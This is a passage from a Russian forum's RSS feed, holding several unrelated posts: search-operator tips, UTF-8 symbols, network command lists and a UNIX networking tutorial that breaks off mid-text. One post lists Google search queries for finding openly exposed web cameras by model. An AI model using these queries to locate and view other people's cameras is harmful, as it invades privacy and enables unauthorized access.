https://antik.mybb.ru/ АнтиК ru-ru Sun, 10 Jul 2022 10:03:55 +0300 MyBB/mybb.ru https://antik.mybb.ru/viewtopic.php?pid=69#p69 <p>Секреты безопасности и анонимности в интернете [2021] Колисниченко</p> <p>Даже новички знают, что вычислить любого пользователя в Интернете совсем несложно. Книга рассказывает, как скрыть свое местонахождение и IP-адрес, используя анонимные сервисы и сеть Tor, посетить заблокированные администратором сайты, защитить личную переписку, домашние устройства и беспроводную сеть. Рассматриваются способы предотвратить утечку персональных данных, обеспечить безопасность мобильных устройств под управлением Android. Особое внимание уделено вопросам конфиденциальности в социальных сетях и личной переписки. В книге рассматриваются самые актуальные технологии информационной безопасности и современные версии программ.</p> mybb@mybb.ru (хуй) Sun, 10 Jul 2022 10:03:55 +0300 https://antik.mybb.ru/viewtopic.php?pid=69#p69 https://antik.mybb.ru/viewtopic.php?pid=45#p45 <p><span style="font-size: 20px">Язык запросов mail.ru</span></p> <p>Найти точную фразу поможет оператор <strong>двойные кавычки</strong>. Если вы заключите слова запроса в кавычки, то мы будем искать документы, которые содержат именно такой порядок слов без каких-либо изменений. Например, [&quot;о чем еще говорят мужчины&quot;] найдет документы, которые содержат информацию именно о второй части фильма «о чем говорят мужчины», пропуская страницы с первым фильмом.</p> <p>Оператор <strong>плюс</strong> предлагает найти все результаты, в которых есть это слово, при том, что оно может быть в любой форме. Например, [сиамские кошки +подоконник], найдутся все результаты, в которых <em class="bbuline">обязательно</em> есть слово «подоконник» в любой словоформе.</p> <p>В случае, если поисковая система не может найти результаты, удовлетворяющие вашему запросу, то мы начинаем игнорировать действие операторов. Например, [&quot;роза пахнет розой хоть фиалкой назови её хоть нет&quot;], поскольку нет такой цитаты, то поиск предлагает посмотреть результаты, которые просто содержат такие слова.</p> <p>В том случае, если вы уверены, что интересующая вас информация находится на каком-то определенном сайте, то используйте оператор «<strong>site:</strong>». Например, на запрос [site:health.mail.ru витамины мифы] мы покажем все документы с сайта Здоровье Mail.ru, содержащие слова «витамины» и «мифы».</p> mybb@mybb.ru (antik) Mon, 16 Dec 2019 19:08:01 +0300 https://antik.mybb.ru/viewtopic.php?pid=45#p45 https://antik.mybb.ru/viewtopic.php?pid=42#p42 <p>Поиск расшаренных web-камер с помощью Google</p> <p>inurl:MultiCameraFrame?Mode=</p> <p>inurl:&quot;ViewerFrame?Mode=&quot;</p> <p>inurl:netw_tcp.shtml</p> <p>intitle:&quot;supervisioncam protocol&quot;</p> <p>inurl:CgiStart?page=Single</p> <p>inurl:indexFrame.shtml?newstyle=Quad</p> <p>intitle:liveapplet inurl:LvAppl</p> <p>inurl:/showcam.php?camid</p> <p>inurl:video.cgi?resolution=</p> <p>inurl:image?cachebust=</p> <p>intitle:&quot;Live View / - AXIS&quot;</p> <p>inurl:view/view.shtml</p> <p>intext:&quot;MOBOTIX M1&quot;</p> <p>intext:&quot;Open Menu&quot;</p> <p>intitle:snc-rz30</p> <p>inurl:home/</p> <p>inurl:&quot;MultiCameraFrame?Mode=&quot;</p> <p>intitle:&quot;EvoCam&quot; inurl:&quot;webcam.html?quot;</p> <p>intitle:&quot;Live NetSnap Cam-Server feed&quot;</p> <p>intitle:&quot;Live View / - AXIS 206M&quot;</p> <p>intitle:&quot;Live View / - AXIS 206W&quot;</p> <p>intitle:&quot;Live View / - AXIS 210&quot;</p> <p>inurl:indexFrame.shtml Axis</p> <p>inurl:&quot;ViewerFrame?Mode=&quot;</p> <p>inurl:&quot;MultiCameraFrame?Mode=Motion&quot;</p> <p>intitle:start inurl:cgistart</p> <p>intitle:&quot;WJ-NT104 Main Page&quot;</p> <p>intext:&quot;MOBOTIX M1&quot; intext:&quot;Open Menu&quot;</p> <p>intext:&quot;MOBOTIX M10&quot; intext:&quot;Open Menu&quot;</p> <p>intext:&quot;MOBOTIX D10&quot; intext:&quot;Open Menu&quot;</p> <p>intitle:snc-z20 inurl:home/</p> <p>intitle:snc-cs3 inurl:home/</p> <p>intitle:snc-rz30 inurl:home/</p> <p>intitle:&quot;sony network camera snc-p1&quot;</p> <p>intitle:&quot;sony network camera snc-m1&quot;</p> <p>site:.viewnetcam.com -w w w.viewnetcam.com</p> <p>intitle:&quot;Toshiba Network Camera&quot; user login</p> <p>intitle:&quot;netcam live image&quot;</p> <p>intitle:&quot;i-Catcher Console - Web Monitor&quot;</p> <p>inurl:/home/home</p> <p>intitle:flexwatch intext:&quot;Copyright by Seyeon TECH Co&quot;</p> <p>intitle:&quot;snc-rz30 home&quot;</p> <p>intitle: Network camera</p> mybb@mybb.ru (H4ck3r) Sun, 27 Sep 2015 11:13:57 +0300 https://antik.mybb.ru/viewtopic.php?pid=42#p42 https://antik.mybb.ru/viewtopic.php?pid=41#p41 <p>Популярные графические символы UTF-8 для сайтов</p> <p>В данной статье собраны самые популярные и востребованные графические символы из таблиц UTF-8. Всех их можно добавить на свой сайт и, таким образом, разнообразить предоставляемую информацию, путем &quot;вкрапления&quot; картинок в стройные &#9773; ряды букв. Помимо этого Вы можете использовать данные знаки на своей странице ВКонтакте, либо при комментировании сторонних блогов.</p> <p>Некоторые вебмастера добавляют подобные символы в Description страницы, что позволяет украсить сниппет и привлечь дополнительных пользователей на сайт не за счет высокой позиции в поисковой выдаче, а за счет выделения на фоне конкурентов.</p> <p>Обращаю Ваше внимание<br />в некоторых браузерах часть представленных знаков могут не отображаться, а вместо них будет выводиться квадрат, либо непонятные прямоугольник с набором букв внутри. Это связано с разными технологиями, которые используют разработчики браузеров (Mozilla FireFox, Chrome, Opera и IE), а так же версией Windows.</p> <p>О том, как украсить снипет в поисковой выдаче, читайте на блогах, посвященных SEO (проблем не возникнет при поиске, ибо почти на каждом таком сайте есть статья на тему). Я же Вам предлагаю сборку самых красивых и оригинальных графических картинок, которые Вы сможете использовать простым копированием из данной статьи через буфер обмена и вставкой в нужное место. Поэтому добавляйте эту страницу в закладки (CTRL+D) и возвращайтесь, когда будете писать новую статью.</p> <p>Прочитать о UTF-8 Вы можете на Википедии.</p> <p>Если знаки кажутся Вам маленькими, то достаточно их увеличить точно так же, как Вы увеличиваете шрифт на своем сайте. Аналогично и с цветом - выделяете и меняете в панели редактирования статьи.<br />Символы алфавита</p> <p>&#9398; &#9399; &#9400; &#9401; &#9402; &#9403; &#9404; &#9405; &#9406; &#9407; &#9408; &#9409; &#9410; &#9411; &#9412; &#9413; &#9414; &#9415; &#9416; &#9417; &#9418; &#9419; &#9420; &#9421; &#9422; &#9423; &#9424; &#9425; &#9426; &#9427; &#9428; &#9429; &#9430; &#9431; &#9432; &#9433; &#9434; &#9435; &#9436; &#9437; &#9438; &#9439; &#9440; &#9441; &#9442; &#9443; &#9444; &#9445; &#9446; &#9447; &#9448; &#9449;</p> <p>&#9372; &#9373; &#9374; &#9375; &#9376; &#9377; &#9378; &#9379; &#9380; &#9381; &#9382; &#9383; &#9384; &#9385; &#9386; &#9387; &#9388; &#9389; &#9390; &#9391; &#9392; &#9393; &#9394; &#9395; &#9396; &#9397;</p> <p>Чаще всего данные графические рисунки используют на страницах ВКонтакте, когда выкладывают из них свое имя или фамилию. Хотя, нередки случаи использования алфавита на коммерческих проектах, в целях акцентирования внимания к определенной части текста (к примеру: АКЦИЯ! Весь декабрь скидка 0%).<br />Цифровое обозначение</p> <p>&#9332; &#9333; &#9334; &#9335; &#9336; &#9337; &#9338; &#9339; &#9340; &#9341; &#9342; &#9343; &#9344; &#9345; &#9346; &#9347; &#9348; &#9349; &#9350; &#9351;</p> <p>&#10102; &#10103; &#10104; &#10105; &#10106; &#10107; &#10108; &#10109; &#10110; &#10111;</p> <p>&#8544; &#8545; &#8546; &#8547; &#8548; &#8549; &#8550; &#8551; &#8552; &#8553; &#8554; &#8555;</p> <p>&#9352; &#9353; &#9354; &#9355; &#9356; &#9357; &#9358; &#9359; &#9360; &#9361; &#9362; &#9363; &#9364; &#9365; &#9366; &#9367; &#9368; &#9369; &#9370; &#9371;</p> <p>&#10112; &#10113; &#10114; &#10115; &#10116; &#10117; &#10118; &#10119; &#10120; &#10122; &#10123; &#10124; &#10125; &#10126; &#10127; &#10128; &#10129; &#10130; &#10131;</p> <p>&#9843; &#9844; &#9845; &#9846; &#9847; &#9848; &#9849;</p> <p>С цифрами все просто: указали адрес, телефон или уровень заработной платы. Можете проверить на знакомых, куда они обратят вначале внимание, при заходе на страницу с графическими символами цифр. Поэтому берем на вооружение и повышаем продажи через свои интернет-магазины или корпоративные сайты, где много однообразного текста.<br />Символы-указатели (стрелки)</p> <p>&#8592; &#8593; &#8594; &#8595; &#8596; &#8597; &#8598; &#8599; &#8600; &#8601; &#8602; &#8603; &#8604; &#8605; &#8606; &#8607; &#8608; &#8609; &#8610; &#8611; &#8612; &#8613; &#8614; &#8615; &#8616; &#8617; &#8618; &#8619; &#8620; &#8621; &#8622; &#8623; &#8624; &#8625; &#8626; &#8627; &#8628; &#8629; &#8630; &#8631; &#8632; &#8633; &#8634; &#8635; &#8636; &#8637; &#8638; &#8639; &#8640; &#8641; &#8642; &#8643; &#8644; &#8645; &#8646; &#8647; &#8648; &#8649; &#8650; &#8651; &#8652; &#8653; &#8654; &#8655; &#8656; &#8657; &#8658; &#8659; &#8660; &#8661; &#8662; &#8663; &#8664; &#8665; &#8666; &#8667; &#8668; &#8669; &#8670; &#8671; &#8672; &#8673; &#8674; &#8675; &#8676; &#8677; &#8678; &#8679; &#8680; &#8681; &#8682; &#8683; &#8684; &#8685; &#8686; &#8687; &#8688; &#8689; &#8690; &#8691; &#8692; &#8693; &#8694; &#8695; &#8696; &#8697; &#8698; &#8699; &#8700; &#8701; &#8702; &#8703; &#9166; &#10229; &#10230; &#10231; &#10232; &#10233; &#10234; &#10235; &#10236; &#10237; &#10238; &#10239; &#10496; &#10497; &#10498; &#10499; &#10500; &#10501; &#10502; &#10503; &#10504; &#10505; &#10506; &#10507; &#10508; &#10509; &#10510; &#10511; &#10512; &#10513; &#10514; &#10515; &#10516; &#10517; &#10518; &#10519; &#10520; &#10521; &#10522; &#10523; &#10524; &#10525; &#10526; &#10527; &#10528; &#10529; &#10586; &#10587; &#10588; &#10589; &#10590; &#10591; &#10592; &#10593; &#10594; &#10595; &#10596; &#10597; &#10598; &#10599; &#10600; &#10601; &#10602; &#10603; &#10604; &#10605; &#10606; &#10607; &#10608; &#10609; &#10610; &#10611; &#10612; &#10613; &#10614; &#10615; &#10616; &#10617; &#10618; &#10619; &#10620; &#10621; &#10622; &#10623; &#10161; &#10162; &#10163; &#10164; &#10165; &#10166; &#10167; &#10168; &#10136; &#10137; &#10138; &#10139; &#10140; &#10141; &#10142; &#10143; &#10144; &#10145; &#10146; &#10147; &#10148; &#10149; &#10150; &#10151; &#10152; &#10153; &#10154; &#10155; &#10156; &#10157; &#10158; &#10159; &#10132; &#10169; &#10170; &#10171; &#10172; &#10173; &#10174; &#11012; &#11013; &#11014; &#11015;</p> <p>При помощи стрелок и указателей можно направить скользящий взгляд посетителя сайта в нужном направлении. Причем Вам не потребуется вставлять картинку, что скажется на скорости загрузки страницы со всеми вытекающими последствиями. Выбираем цвет и размер, как было сказано вначале статьи.<br />Фигуры</p> <p>&#9600; &#9601; &#9602; &#9603; &#9604; &#9605; &#9606; &#9607; &#9608; &#9609; &#9610; &#9611; &#9612; &#9613; &#9614; &#9615; &#9616; &#9617; &#9618; &#9619; &#9620; &#9621; &#9632; &#9633; &#9634; &#9635; &#9636; &#9637; &#9638; &#9639; &#9640; &#9641; &#9642; &#9643; &#9644; &#9645; &#9646; &#9647; &#9648; &#9649; &#9650; &#9651; &#9652; &#9653; &#9654; &#9655; &#9656; &#9657; &#9658; &#9659; &#9660; &#9661; &#9662; &#9663; &#9664; &#9665; &#9666; &#9667; &#9668; &#9669; &#9670; &#9671; &#9672; &#9673; &#9674; &#9675; &#9676; &#9677; &#9678; &#9679; &#9680; &#9681; &#9682; &#9683; &#9684; &#9685; &#9686; &#9687; &#9688; &#9689; &#9690; &#9691; &#9692; &#9693; &#9694; &#9695; &#9696; &#9697; &#9698; &#9699; &#9700; &#9701; &#9702; &#9703; &#9704; &#9705; &#9706; &#9707; &#9708; &#9709; &#9710;</p> <p>Комбинируя представленные выше символы из таблицы UTF-8, Вы сможете придумать действительно уникальное оформление, которое будет отличаться своей неординарностью. Главное не переборщить.<br />Забавные символы</p> <p>&#9711; &#9728; &#9729; &#9730; &#9731; &#9732; &#9733; &#9734; &#9735; &#9736; &#9737; &#9738; &#9739; &#9740; &#9741; &#9742; &#9743; &#9744; &#9745; &#9746; &#9747; &#9750; &#9751; &#9754; &#9755; &#9756; &#9757; &#9758; &#9759; &#9760; &#9761; &#9762; &#9763; &#9764; &#9765; &#9766; &#9767; &#9768; &#9769; &#9770; &#9771; &#9772; &#9773; &#9774; &#9775; &#9850; &#9851; &#9852; &#9853; &#9985; &#9986; &#9987; &#9988; &#9990; &#9991; &#9992; &#9993; &#9996; &#9997; &#9998; &#9999; &#10000; &#10001; &#10002; &#10003; &#10004; &#10005; &#10006; &#10007; &#10008; &#10009; &#10010; &#10011; &#10012; &#10013; &#10014; &#10015; &#10016; &#10017; &#10018; &#10019; &#10020; &#10021; &#10022; &#10023; &#10025; &#10026; &#10027; &#10028; &#10029; &#10030; &#10031; &#10032; &#10033; &#10034; &#10035; &#10036; &#10037; &#10038; &#10039; &#10040; &#10041; &#10042; &#10043; &#10044; &#10045; &#10046; &#10047; &#10048; &#10049; &#10050; &#10051; &#10052; &#10053; &#10054; &#10055; &#10056; &#10057; &#10058; &#10059; &#10061; &#10063; &#10064; &#10065; &#10066; &#10070; &#10081; &#10082; &#10083; &#10084; &#10085; &#10086; &#10087; &#3424; &#3425; &#3757; &#3758; &#3759; &#12292; &#8414; &#8415; &#10752; &#10753; &#10754; &#10075; &#10076; &#10077; &#10078; † ‡ &#8882; &#8883; &#8884; &#8885; &#9888; &#9838; &#9839; &#9840; &#9841; &#9842; &#1641;(&#865;&#3663;&#815;&#865;&#3663;)&#1782; &#440;&#820;&#1217;&#820;&#439; &#1769; &#1758; ©</p> <p>Действительно &quot;забавные&quot; картинки. Знак телефона удобно поставить возле номера, самолет отлично подойдет для текстов &quot;авиационной&quot; тематики. &quot;Погодные&quot; и религиозные картинки, звезды и прочие, разнообразят абсолютно любой текст. Лично я всегда использую &#9742;.<br />Математические, физические и прочие науки</p> <p>&#8448; &#8449; &#8450; &#8451; &#8452; &#8453; &#8454; &#8455; &#8456; &#8457; &#8458; &#8459; &#8460; &#8461; &#8462; &#8463; &#8464; &#8465; &#8466; &#8467; &#8468; &#8469; № &#8471; &#8472; &#8473; &#8474; &#8475; &#8476; &#8477; &#8478; &#8479; &#8483; &#8484; &#8485; &#937; &#8487; &#8488; &#8489; K &#197; &#8492; &#8493; &#8494; &#8495; &#8496; &#8497; &#8498; &#8499; &#8500; &#8531; &#8532; &#8533; &#8534; &#8535; &#8536; &#8537; &#8538; &#8539; &#8540; &#8541; &#8542; &#8760; &#8761; &#8762; &#8763; &#8764; &#8765; &#8766; &#8767; &#8768; &#8769; &#8770; &#8771; &#8772; &#8773; &#8774; &#8775; &#8776; &#8777; &#8778; &#8779; &#8780; &#8781; &#8782; &#8783; &#8784; &#8785; &#8786; &#8787; &#8788; &#8789; &#8790; &#8791; &#8792; &#8793; &#8794; &#8795; &#8796; &#8797; &#8798; &#8799; &#8800; &#8801; &#8802; &#8803; &#8804; &#8805; &#8806; &#8807; &#8808; &#8809; &#8810; &#8811; &#8812; &#8813; &#8814; &#8815; &#8816; &#8817; &#8818; &#8819; &#8820; &#8821; &#8822; &#8823; &#8824; &#8825; &#8826; &#8827; &#8828; &#8829; &#8830; &#8831; &#8832; &#8833; &#8834; &#8835; &#8836; &#8837; &#8838; &#8839; &#8840; &#8841; &#8842; &#8843; &#8704; &#8705; &#8706; &#8707; &#8708; &#8709; &#8710; &#8711; &#8712; &#8713; &#8714; &#8715; &#8716; &#8717; &#8718; &#8719; &#8720; &#8721; &#8722; &#8723; &#8724; &#8725; &#8726; &#8727; &#8728; &#8729; &#8730; &#8731; &#8732; &#8733; &#8734; &#8735; &#8736; &#8737; &#8738; &#8739; &#8740; &#8741; &#8742; &#8743; &#8744; &#8745; &#8746; &#8747; &#8748; &#8749; &#8750; &#8751; &#8752; &#8753; &#8754; &#8755; &#9138; &#9139; &#9143; &#8983; &#8984; &#8509; &#8510; &#8511; &#8512;</p> <p>Думаю, что данные символы найдут свое назначение, если у Вас текст научной направленности, либо Вы любите &quot;ввернуть&quot; какое-нибудь умное словечко, подкрепив его картинкой.</p> mybb@mybb.ru (utf-8) Fri, 21 Aug 2015 10:32:31 +0300 https://antik.mybb.ru/viewtopic.php?pid=41#p41 https://antik.mybb.ru/viewtopic.php?pid=40#p40 <p>Команды по управлению и диагностике сети в Windows.</p> <p>arp<br />ipconfig<br />getmac<br />nbtstat<br />netsh<br />netstat<br />net<br />nslookup<br />pathping<br />ping<br />route<br />telnet<br />tracert</p> <p>Примеры практического использования.</p> <p>Команды по управлению и диагностике сети в UNIX.</p> <p>arp<br />host<br />ifconfig<br />ip<br />iptables<br />netstat<br />nmap<br />ping<br />route<br />ssh<br />tcpdump<br />telnet<br />traceroute</p> mybb@mybb.ru (bash) Tue, 10 Mar 2015 14:18:57 +0300 https://antik.mybb.ru/viewtopic.php?pid=40#p40 https://antik.mybb.ru/viewtopic.php?pid=39#p39 <p>Методические указания по командам управления сетью в UNIX</p> <p>Команды по конфигурированию сети</p> <p>ifconfig</p> <p>&#160; &#160; Команда используется для настройки сетевых интерфейсов</p> <p>&#160; &#160; Команда ifconfig имеет следующий синтаксис:</p> <p>&#160; &#160; ifconfig [-L] [-m] interface [create] [address_family] [address [dest_address]] [parameters]<br />&#160; &#160; ifconfig interface destroy<br />&#160; &#160; ifconfig -a [-L] [-d] [-m] [-u] [address_family]<br />&#160; &#160; ifconfig -l [-d] [-u] [address_family]<br />&#160; &#160; ifconfig [-L] [-d] [-m] [-u] [-C]</p> <p>&#160; &#160; Команда ifconfig используется для настройки сетевых интерфейсов. Команда должна использоваться при загрузке системы для настройки адресов каждого сетевого интерфейса, а также может использоваться после загрузки для изменения параметров сетевых интерфейсов. Если команда введена без аргументов, ifconfig выдает информацию о состоянии активных интерфейсов. Если в качестве аргумента указан какой-либо интерфейс, то выдается информация только о состоянии этого интерфейса; если указан один аргумент -a, выдается информация о состоянии всех интерфесов, даже отключенных. Пример:</p> <p>&#160; &#160; user@desktop$ ifconfig rl0<br />&#160; &#160; rl0: flags=8843&lt;UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST&gt; mtu 1500<br />&#160; &#160; &#160; &#160;options=8&lt;VLAN_MTU&gt;<br />&#160; &#160; &#160; &#160;inet6 fe80::250:22ff:febb:5f1%rl0 prefixlen 64 scopeid 0x3<br />&#160; &#160; &#160; &#160;inet 192.168.19.86 netmask 0xffffff00 broadcast 192.168.19.255<br />&#160; &#160; &#160; &#160;ether 00:50:22:bb:05:f1<br />&#160; &#160; &#160; &#160;media: Ethernet autoselect (100baseTX &lt;full-duplex&gt;)<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;status: active</p> <p>&#160; &#160; Иначе команда конфигурирует указанный интерфейс. Изменить настройки какого-либо интерфейса может только суперпользователь.</p> <p>&#160; &#160; Опции:<br />&#160; &#160; интерфейс – имя интерфейса (например, rl0 в BSD или eth0 в Linux).<br />&#160; &#160; up – вызывает активизацию интерфейса. Задается неявно при присвоении адреса интерфейсу.<br />&#160; &#160; down – вызывает остановку работы драйвера для интерфейса.<br />&#160; &#160; [-]arp – включает или отключает использование протокола ARP для интерфейса.<br />&#160; &#160; [-]promisc – включает или отключает неразборчивый режим (promiscuous mode) работы интерфейса. В этом режиме все проходящие по сети пакеты будут приниматься интерфейсом.<br />&#160; &#160; [-]allmulti – включает или отключает режим all-multicast. В этом режиме все многоадресные (multicast) пакеты в сети будут приниматься интерфейсом.<br />&#160; &#160; metric N – устанавливает метрику интерфейса.<br />&#160; &#160; mtu N – устанавливает максимальный размер пакета (Maximum Transfer Unit - MTU) для интерфейса.<br />&#160; &#160; адрес – IP-адрес, присваиваемый интерфейсу.<br />&#160; &#160; netmask адрес – устанавливает маску сети IP для этого интерфейса. По умолчанию используется обычная маска сети класса A, B или C (что определяется по IP-адресу интерфейса), но можно усановить любое значение.<br />&#160; &#160; add адрес/длина_префикса – добавляет адрес IPv6 для интерфейса.<br />&#160; &#160; del адрес/длина_префикса – удаляет адрес IPv6 для интерфейса.<br />&#160; &#160; irq адрес – устанавливает аппаратное прерывание, используемое устройством. Не для всех устройств можно динамически менять значение IRQ.<br />&#160; &#160; media тип – устанавливает физический порт или тип носителя, используемый устройством. Не для всех устройств можно менять этот параметр, и для разных устройств могут поддерживаться различные значения. Типичные значения типа - 10base2 (коаксиальный кабель Ethernet), 10baseT (витая пара Ethernet 10 Мбит/сек), AUI (внешний передатчик) и т.д. Специальный тип носителя auto можно использовать, чтобы потребовать от драйвера автоматически обпределять тип носителя. Не все драйверы могут это делать.<br />&#160; &#160; [-]broadcast [адрес] – если указан аргумент адрес, задает соответствующий протоколу широковещательный адрес для интерфейса. В противном случае устанавливает (или сбрасывает) флаг IFF_BROADCAST для интерфейса.</p> <p>&#160; &#160; Пример. изменение IP-адреса интерфейса rl0:</p> <p>&#160; &#160; user@desktop ~ $ ifconfig rl0<br />&#160; &#160; rl0: flags=8843&lt;UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST&gt; mtu 1500<br />&#160; &#160; &#160; &#160;options=8&lt;VLAN_MTU&gt;<br />&#160; &#160; &#160; &#160;inet6 fe80::250:22ff:febb:5f1%rl0 prefixlen 64 scopeid 0x3<br />&#160; &#160; &#160; &#160;inet 192.168.19.86 netmask 0xffffff00 broadcast 192.168.19.255<br />&#160; &#160; &#160; &#160;ether 00:50:22:bb:05:f1<br />&#160; &#160; &#160; &#160;media: Ethernet autoselect (100baseTX &lt;full-duplex&gt;)<br />&#160; &#160; &#160; &#160;status: active<br />&#160; &#160; user@desktop ~ $ ifconfig rl0 192.168.0.1<br />&#160; &#160; user@desktop ~ $ ifconfig rl0<br />&#160; &#160; rl0: flags=8843&lt;UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST&gt; mtu 1500<br />&#160; &#160; &#160; &#160;options=8&lt;VLAN_MTU&gt;<br />&#160; &#160; &#160; &#160;inet6 fe80::250:22ff:febb:5f1%rl0 prefixlen 64 scopeid 0x3<br />&#160; &#160; &#160; &#160;inet 192.168.0.1 netmask 0xffffff00 broadcast 192.168.19.255<br />&#160; &#160; &#160; &#160;ether 00:50:22:bb:05:f1<br />&#160; &#160; &#160; &#160;media: Ethernet autoselect (100baseTX &lt;full-duplex&gt;)<br />&#160; &#160; &#160; &#160;status: active</p> <p>arp</p> <p>&#160; &#160; Команда arp отображает ARP-таблицу данного хоста. С помощью параметра -i можно специфицировать сетевой интерфейс, информация о котором интересует.</p> <p>&#160; &#160; desktop ~ # arp -i eth0<br />&#160; &#160; Address&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; HWtype&#160; HWaddress&#160; &#160; &#160; &#160; &#160; &#160;Flags Mask&#160; &#160; &#160; &#160; &#160; &#160; Iface<br />&#160; &#160; DIMON.mshome.net&#160; &#160; &#160; &#160; &#160;ether&#160; &#160;00:50:BF:12:8A:9E&#160; &#160;C&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;eth0</p> <p>&#160; &#160; Таблица с информацией о канальном уровне содержит связь IP- и MAC-адресов. При использовании параметра -n IP-адреса не будут заменяться символьными именами хостов.<br />route</p> <p>&#160; &#160; Эта команда используется для просмотра и изменения таблицы маршрутизации хоста. Для этой команды также работает параметр -n, при использовании которого IP-адреса не будут заменяться символьными именами хостов.</p> <p>&#160; &#160; Пример обычной таблицы маршрутизации для отдельного компьютера в сети:</p> <p>&#160; &#160; desktop ~ # route -n<br />&#160; &#160; Kernel IP routing table<br />&#160; &#160; Destination&#160; &#160; &#160;Gateway&#160; &#160; &#160; &#160; &#160;Genmask&#160; &#160; &#160; &#160; &#160;Flags Metric Ref&#160; &#160; Use Iface<br />&#160; &#160; 192.168.5.0&#160; &#160; &#160;0.0.0.0&#160; &#160; &#160; &#160; &#160;255.255.255.0&#160; &#160;U&#160; &#160; &#160;0&#160; &#160; &#160; 0&#160; &#160; &#160; &#160; 0 eth1<br />&#160; &#160; 127.0.0.0&#160; &#160; &#160; &#160;0.0.0.0&#160; &#160; &#160; &#160; &#160;255.0.0.0&#160; &#160; &#160; &#160;U&#160; &#160; &#160;0&#160; &#160; &#160; 0&#160; &#160; &#160; &#160; 0 lo<br />&#160; &#160; 0.0.0.0&#160; &#160; &#160; &#160; &#160;192.168.5.254&#160; &#160;0.0.0.0&#160; &#160; &#160; &#160; &#160;UG&#160; &#160; 0&#160; &#160; &#160; 0&#160; &#160; &#160; &#160; 0 eth1</p> <p>&#160; &#160; Особый интерес представляет адрес 0.0.0.0, который соответствует хосту назначения по умолчанию.</p> <p>&#160; &#160; Для добавление нового маршрута к определённому хосту используются параметры add и -host:</p> <p>&#160; &#160; desktop ~ # route add -host 192.168.0.1 eth0</p> <p>&#160; &#160; Эта команда создаёт новую строку в таблице маршрутизации, согласно которой все пакеты к узлу 192.168.0.1 должны отправляться в сетевой интерфейс eth0.</p> <p>&#160; &#160; Также можно добавлять шлюз для отправки пакетов в определённую сеть или к хосту:</p> <p>&#160; &#160; desktop ~ # route add -net 192.168.1.0 gw 192.168.0.5</p> <p>&#160; &#160; Таким образом, все пакеты для сети 192.168.1.0 будут направляться на узел 192.168.0.5.</p> <p>&#160; &#160; Аналогично, маршруты удаляются параметром del с указанием всей информации о маршруте:</p> <p>&#160; &#160; desktop ~ # route del default gw 192.168.0.1</p> <p>&#160; &#160; Эта команда удаляет маршрут по умолчанию через хост 192.168.0.1.</p> <p>Команды по диагностике сети</p> <p>ping</p> <p>&#160; &#160; Команда используется для посылки пакетов ICMP ECHO_REQUEST сетевым хостам.</p> <p>&#160; &#160; Команда ping имеет следующий синтаксис:</p> <p>&#160; &#160; ping [-AaDdfnoQqRrv] [-c число_пакетов] [-i секунд] [-l preload] [-M mask | time]<br />&#160; &#160; &#160; &#160; [-m ttl] [-P policy] [-p pattern] [-S src_addr] [-s packetsize]<br />&#160; &#160; &#160; &#160; [-t timeout] [-z tos] host<br />&#160; &#160; ping [-AaDdfLnoQqRrv] [-c число_пакетов] [-I iface] [-i секунд] [-l preload]<br />&#160; &#160; &#160; &#160; [-M mask | time] [-m ttl] [-P policy] [-p pattern] [-S src_addr]<br />&#160; &#160; &#160; &#160; [-s packetsize] [-T ttl] [-t timeout] [-z tos] mcast-group</p> <p>&#160; &#160; Команда ping использует датаграмму ECHO_REQUEST протокола ICMP, чтобы вызвать ответ ICMP ECHO_RESPONSE указанного хоста или сетевого шлюза. Если хост отвечает, ping выдает сообщение, что хост включен (хост is alive), в стандартный выходной поток.</p> <p>&#160; &#160; Для проверки наличия хоста в сети достаточно ввести команду ping с аргументом - именем или адресом хоста:</p> <p>&#160; &#160; user@desktop$ ping yandex.ru<br />&#160; &#160; 64 bytes from 213.180.204.11: icmp_seq=0 ttl=48 time=5.659 ms<br />&#160; &#160; 64 bytes from 213.180.204.11: icmp_seq=1 ttl=48 time=5.404 ms<br />&#160; &#160; 64 bytes from 213.180.204.11: icmp_seq=2 ttl=48 time=4.889 ms<br />&#160; &#160; ^C<br />&#160; &#160; --- yandex.ru ping statistics ---<br />&#160; &#160; 3 packets transmitted, 3 packets received, 0% packet loss<br />&#160; &#160; round-trip min/avg/max/stddev = 4.889/5.317/5.659/0.320 ms</p> <p>&#160; &#160; Для отправки определенного числа пакетов необходимо указать опцию -c число_пакетов. Для установки интервала между отправкой пакетов используется опция -i секунд.<br />traceroute</p> <p>&#160; &#160; Команда traceroute служит для отладки сетевых соединений посредством построения маршрута следования пакетов к хосту назначения. Для этой команды также работает параметр -n, при использовании которого IP-адреса не будут заменяться символьными именами хостов.</p> <p>&#160; &#160; Пример следования пакетов до хоста ya.ru:</p> <p>&#160; &#160; desktop ~ # traceroute ya.ru<br />&#160; &#160; traceroute to ya.ru (213.180.204.8), 64 hops max, 40 byte packets<br />&#160; &#160; &#160;1&#160; 195.91.230.65 (195.91.230.65)&#160; 0.890 ms&#160; 1.907 ms&#160; 0.809 ms<br />&#160; &#160; &#160;2&#160; cs7206.rinet.ru (195.54.192.28)&#160; 0.895 ms&#160; 0.769 ms&#160; 0.605 ms<br />&#160; &#160; &#160;3&#160; ix2-m9.yandex.net (193.232.244.93)&#160; 1.855 ms&#160; 1.519 ms&#160; 2.95 ms<br />&#160; &#160; &#160;4&#160; c3-vlan4.yandex.net (213.180.210.146)&#160; 3.412 ms&#160; 2.698 ms&#160; 2.654 ms<br />&#160; &#160; &#160;5&#160; ya.ru (213.180.204.8)&#160; 2.336 ms&#160; 2.612 ms&#160; 3.482 ms</p> <p>netstat</p> <p>&#160; &#160; Команда используется для показа состояния сети.</p> <p>&#160; &#160; Команда netstat имеет следующий синтаксис:</p> <p>&#160; &#160; netstat [-AaLnSW] [-f protocol_family | -p protocol] [-M core] [-N system]</p> <p>&#160; &#160; Команда netstat показывает содержимое различных структур данных, связанных с сетью, в различных форматах в зависимости от указанных опций. Первая форма команды показывает список активных сокетов (sockets) для каждого протокола. Вторая форма выбирает одну из нескольких других сетевых структур данных. Третья форма показывает динамическую статистику пересылки пакетов по сконфигурированным сетевым интерфейсам; аргумент интервал задает, сколько секунд собирается информация между последовательными показами.</p> <p>&#160; &#160; -p имя_протокола Ограничить показ статистики или адресов управляющих блоков только протоколом с указанным именем_протокола, например, tcp.</p> <p>&#160; &#160; Опции:<br />&#160; &#160; -a – показывать состояние всех сокетов; обычно 